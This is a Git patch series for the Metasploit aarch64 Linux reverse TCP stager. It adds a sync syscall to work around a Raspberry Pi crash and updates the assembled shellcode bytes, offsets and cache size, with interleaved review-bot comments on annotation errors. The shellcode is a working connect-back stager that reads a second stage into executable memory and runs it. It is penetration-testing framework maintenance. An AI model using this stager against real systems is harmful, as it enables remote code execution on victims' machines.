From 48763208143413c3fd008ea3e6dbb9a02796a0f2 Mon Sep 17 00:00:00 2001
From: dledda-r7
Date: Wed, 12 Feb 2025 11:33:45 -0500
Subject: [PATCH 1/5] fix: add sync syscall after read to prevent sigill in raspberrypi
---
 .../linux/aarch64/stager_sock_reverse.s | 4 +
 .../stagers/linux/aarch64/reverse_tcp.rb | 114 +++++++++---------
 2 files changed, 63 insertions(+), 55 deletions(-)
diff --git a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
index f8b354fbc5..1a9ef4fa2a 100644
--- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
@@ -77,6 +77,10 @@ read_loop:
 svc 0
 cmn x0, #0x1
 beq failed
+ mov x2, x0
+ mov x8, #0x51
+ svc 0
+ mov x0, x2
 add x3, x3, x0
 subs x4, x4, x0
 bne read_loop
diff --git a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
index d1cdca6aa4..38c45fc41f 100644
--- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
@@ -32,65 +32,69 @@ module MetasploitModule
 {
 'Offsets' =>
 {
- 'LPORT' => [ 206, 'n' ],
- 'LHOST' => [ 208, 'ADDR' ],
+ 'LPORT' => [ 212, 'n' ],
+ 'LHOST' => [ 224, 'ADDR' ],
 },
 'Payload' =>
 [
 # Generated from external/source/shellcode/linux/aarch64/stager_sock_reverse.s
- 0xd2800040, # mov x0, #0x2 // #2
- 0xd2800021, # mov x1, #0x1 // #1
- 0xd2800002, # mov x2, #0x0 // #0
- 0xd28018c8, # mov x8, #0xc6 // #198
- 0xd4000001, # svc #0x0
- 0xaa0003ec, # mov x12, x0
- 0x100005a1, # adr x1, cc
- 0xd2800202, # mov x2, #0x10 // #16
- 0xd2801968, # mov x8, #0xcb // #203
- 0xd4000001, # svc #0x0
- 0x350004c0, # cbnz w0, c0
- 0xaa0c03e0, # mov x0, x12
- 0xd10043ff, # sub sp, sp, #0x10
- 0x910003e1, # mov x1, sp
- 0xd2800082, # mov x2, #0x4 // #4
- 0xd28007e8, # mov x8, #0x3f // #63
- 0xd4000001, # svc #0x0
- 0xb100041f, # cmn x0, #0x1
- 0x540003c0, # b.eq c0
- 0xb94003e2, # ldr w2, [sp]
- 0xd34cfc42, # lsr x2, x2, #12
- 0x91000442, # add x2, x2, #0x1
- 0xd374cc42, # lsl x2, x2, #12
- 0xaa1f03e0, # mov x0, xzr
- 0xaa0203e1, # mov x1, x2
- 0xd28000e2, # mov x2, #0x7 // #7
- 0xd2800443, # mov x3, #0x22 // #34
- 0xaa1f03e4, # mov x4, xzr
- 0xaa1f03e5, # mov x5, xzr
- 0xd2801bc8, # mov x8, #0xde // #222
- 0xd4000001, # svc #0x0
- 0xb100041f, # cmn x0, #0x1
- 0x54000200, # b.eq c0
- 0xb94003e4, # ldr w4, [sp]
- 0xf90003e0, # str x0, [sp]
- 0xaa0003e3, # mov x3, x0
- 0xaa0c03e0, # mov x0, x12
- 0xaa0303e1, # mov x1, x3
- 0xaa0403e2, # mov x2, x4
- 0xd28007e8, # mov x8, #0x3f // #63
- 0xd4000001, # svc #0x0
- 0xb100041f, # cmn x0, #0x1
- 0x540000c0, # b.eq c0
- 0x8b000063, # add x3, x3, x0
- 0xeb000084, # subs x4, x4, x0
- 0x54fffee1, # b.ne 90
- 0xf94003e0, # ldr x0, [sp]
- 0xd63f0000, # blr x0
- 0xd2800000, # mov x0, #0x0 // #0
- 0xd2800ba8, # mov x8, #0x5d // #93
- 0xd4000001, # svc #0x0
- 0x5c110002, # .word 0x5c110002
- 0x0100007f, # .word 0x0100007f
+ 0xd2800040, # mov x0, #0x2 // #2
+ 0xd2800021, # mov x1, #0x1 // #1
+ 0xd2800002, # mov x2, #0x0 // #0
+ 0xd28018c8, # mov x8, #0xc6 // #198
+ 0xd4000001, # svc #0x0
+ 0xaa0003ec, # mov x12, x0
+ 0x10000621, # adr x1, dc
+ 0xd2800202, # mov x2, #0x10 // #16
+ 0xd2801968, # mov x8, #0xcb // #203
+ 0xd4000001, # svc #0x0
+ 0x35000540, # cbnz w0, d0
+ 0xaa0c03e0, # mov x0, x12
+ 0xd10043ff, # sub sp, sp, #0x10
+ 0x910003e1, # mov x1, sp
+ 0xd2800082, # mov x2, #0x4 // #4
+ 0xd28007e8, # mov x8, #0x3f // #63
+ 0xd4000001, # svc #0x0
+ 0xb100041f, # cmn x0, #0x1
+ 0x54000440, # b.eq d0 // b.none
+ 0xb94003e2, # ldr w2, [sp]
+ 0xd34cfc42, # lsr x2, x2, #12
+ 0x91000442, # add x2, x2, #0x1
+ 0xd374cc42, # lsl x2, x2, #12
+ 0xaa1f03e0, # mov x0, xzr
+ 0xaa0203e1, # mov x1, x2
+ 0xd28000e2, # mov x2, #0x7 // #7
+ 0xd2800443, # mov x3, #0x22 // #34
+ 0xaa1f03e4, # mov x4, xzr
+ 0xaa1f03e5, # mov x5, xzr
+ 0xd2801bc8, # mov x8, #0xde // #222
+ 0xd4000001, # svc #0x0
+ 0xb100041f, # cmn x0, #0x1
+ 0x54000280, # b.eq d0 // b.none
+ 0xb94003e4, # ldr w4, [sp]
+ 0xf90003e0, # str x0, [sp]
+ 0xaa0003e3, # mov x3, x0
+ 0xaa0c03e0, # mov x0, x12
+ 0xaa0303e1, # mov x1, x3
+ 0xaa0403e2, # mov x2, x4
+ 0xd28007e8, # mov x8, #0x3f // #63
+ 0xd4000001, # svc #0x0
+ 0xb100041f, # cmn x0, #0x1
+ 0x54000140, # b.eq d0 // b.none
+ 0xaa0003e2, # mov x2, x0
+ 0xd2800a28, # mov x8, #0x51 // #81
+ 0xd4000001, # svc #0x0
+ 0xaa0203e0, # mov x0, x2
+ 0x8b000063, # add x3, x3, x0
+ 0xeb000084, # subs x4, x4, x0
+ 0x54fffe61, # b.ne 90 // b.any
+ 0xf94003e0, # ldr x0, [sp]
+ 0xd63f0000, # blr x0
+ 0xd2800000, # mov x0, #0x0 // #0
+ 0xd2800ba8, # mov x8, #0x5d // #93
+ 0xd4000001, # svc #0x0
+ 0x5c110002, # .short 0x5c110002
+ 0x0100007f # .word 0x0100007f
 ].pack("V*") } ))
From d22ed19b021a70f726cbf4c3a1547450a625da33 Mon Sep 17 00:00:00 2001
From: dledda-r7
Date: Wed, 12 Feb 2025 11:49:35 -0500
Subject: [PATCH 2/5] fix: fix port number offset
---
 modules/payloads/stagers/linux/aarch64/reverse_tcp.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
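Review bot: The annotation on the new second-to-last payload word changed from `.word 0x5c110002` to `.short 0x5c110002`, but the value is 32 bits wide and the array is still serialised with `pack("V*")`, so the comment now misdescribes the data it sits next to; keep `# .word 0x5c110002`. These two trailing words are the sockaddr_in the LPORT/LHOST offsets patch (family and port, then address), so a one-line `# sockaddr_in: AF_INET + port, then address` above them would make the offsets easier to audit. Those offsets and CachedSize are hand-maintained copies of "payload length - 8 + 2", "- 8 + 4" and the array length: this hunk moves LPORT to 212, which with 57 words (228 bytes) lands inside the instruction stream rather than the sockaddr, and the following patches in the series have to correct it to 222 and CachedSize to 228. Deriving the three values from the packed payload's length instead of editing them by hand would remove that failure mode for the next regeneration.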
diff --git a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
index 38c45fc41f..8a3e4759fc 100644
--- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
@@ -32,7 +32,7 @@ module MetasploitModule
 {
 'Offsets' =>
 {
- 'LPORT' => [ 212, 'n' ],
+ 'LPORT' => [ 222, 'n' ],
 'LHOST' => [ 224, 'ADDR' ],
 },
 'Payload' =>
From 4e5a21bfab0c8bd4c84bdf5996c9e18ddd708f2e Mon Sep 17 00:00:00 2001
From: bwatters-r7
Date: Wed, 12 Feb 2025 13:40:34 -0600
Subject: [PATCH 3/5] Update payload cache size
---
 modules/payloads/stagers/linux/aarch64/reverse_tcp.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
index 8a3e4759fc..2a60f033f4 100644
--- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
@@ -15,7 +15,7 @@ ###
 module MetasploitModule
- CachedSize = 212
+ CachedSize = 228
 include Msf::Payload::Linux::Aarch64::Prepends
 include Msf::Payload::Stager
From 80b76e4f5f294df721048674bcaac00b96dc9680 Mon Sep 17 00:00:00 2001
From: dledda-r7
Date: Fri, 14 Feb 2025 04:31:11 -0500
Subject: [PATCH 4/5] docs: add reference to the pull-request inside source
---
 .../source/shellcode/linux/aarch64/stager_sock_reverse.s | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
index 1a9ef4fa2a..026caf3079 100644
--- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
@@ -77,10 +77,10 @@ read_loop:
 svc 0
 cmn x0, #0x1
 beq failed
- mov x2, x0
- mov x8, #0x51
- svc 0
- mov x0, x2
+ mov x2, x0 # The 'sync' syscall was added to fix a strange bug in RaspberryPi 4
+ mov x8, #0x51 # More information here:
+ svc 0 # https://github.com/rapid7/metasploit-framework/pull/19875
+ mov x0, x2 #
 add x3, x3, x0
 subs x4, x4, x0
 bne read_loop
From cdac13550bf393b91ec164c0945de3d47c571712 Mon Sep 17 00:00:00 2001
From: dledda-r7
Date: Wed, 19 Feb 2025 03:57:36 -0500
Subject: [PATCH 5/5] fix: sync syscall comment
---
 .../source/shellcode/linux/aarch64/stager_sock_reverse.s | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
index 026caf3079..7079a091b2 100644
--- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
@@ -77,10 +77,10 @@ read_loop:
 svc 0
 cmn x0, #0x1
 beq failed
- mov x2, x0 # The 'sync' syscall was added to fix a strange bug in RaspberryPi 4
- mov x8, #0x51 # More information here:
- svc 0 # https://github.com/rapid7/metasploit-framework/pull/19875
- mov x0, x2 #
+ mov x2, x0 // The 'sync' syscall was added to fix a strange bug in RaspberryPi 4
+ mov x8, #0x51 // More information here:
+ svc 0 // https://github.com/rapid7/metasploit-framework/pull/19875
+ mov x0, x2 //
 add x3, x3, x0
 subs x4, x4, x0
 bne read_loop
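Review bot: The re-delimited comment on the four `sync` lines records where the change came from but still not what the syscall does or why it is believed to help; `mov x8, #0x51` selects sync(2) (arm64 syscall 81), a filesystem buffer flush with no documented effect on instruction fetch, so "fix a strange bug" leaves the next maintainer unable to judge whether the workaround is still needed or safe to remove. State the symptom and the status explicitly, e.g. `// Workaround: without a syscall here, executing the bytes just read into the mapped buffer faulted with SIGILL on Raspberry Pi 4. sync(2) (nr 81) is used only for its side effect; root cause unconfirmed, see PR 19875`. The `mov x2, x0` / `mov x0, x2` pair also deserves its own note, `// keep read()'s byte count in x2 across the syscall, which overwrites x0`, because `add x3, x3, x0` and `subs x4, x4, x0` below depend on it. The same wording applies to the PATCH 4/5 hunk above, which this hunk only changes from `#` to `//` delimiters.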